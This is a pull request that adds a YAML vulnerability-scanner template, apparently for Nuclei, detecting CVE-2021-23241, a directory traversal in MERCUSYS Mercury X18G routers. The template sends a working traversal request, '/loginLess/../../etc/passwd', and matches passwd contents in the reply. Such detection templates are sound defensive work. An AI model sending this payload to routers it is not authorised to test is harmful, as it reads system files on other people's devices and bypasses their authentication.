### PR TITLE
Create CVE-2021-23241.yaml

### DIFF
--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: medium
   reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
-  tags: cve,cve2021,iot,lfi
+  tags: cve,cve2021,iot,lfi,router
 
 requests:
   - method: GET

--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -1,0 +1,23 @@
+id: CVE-2021-23241
+
+info:
+  name: Mercury Router Web Server Directory Traversal
+  author: daffainfo
+  severity: medium
+  reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+  tags: cve,cve2021,iot,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/loginLess/../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[0*]:0:0"
+        part: body
+      - type: status
+        status:
+          - 200

--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -4,7 +4,11 @@ info:
   name: Mercury Router Web Server Directory Traversal
   author: daffainfo
   severity: medium
-  reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+  description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
+  reference: |
+    - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
+reference: 
   tags: cve,cve2021,iot,lfi,router
 
 requests:

--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -8,7 +8,6 @@ info:
   reference: |
     - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
     - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
-reference: 
   tags: cve,cve2021,iot,lfi,router
 
 requests:
@@ -22,6 +21,7 @@ requests:
         regex:
           - "root:[0*]:0:0"
         part: body
+
       - type: status
         status:
           - 200


### PR DESCRIPTION
MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.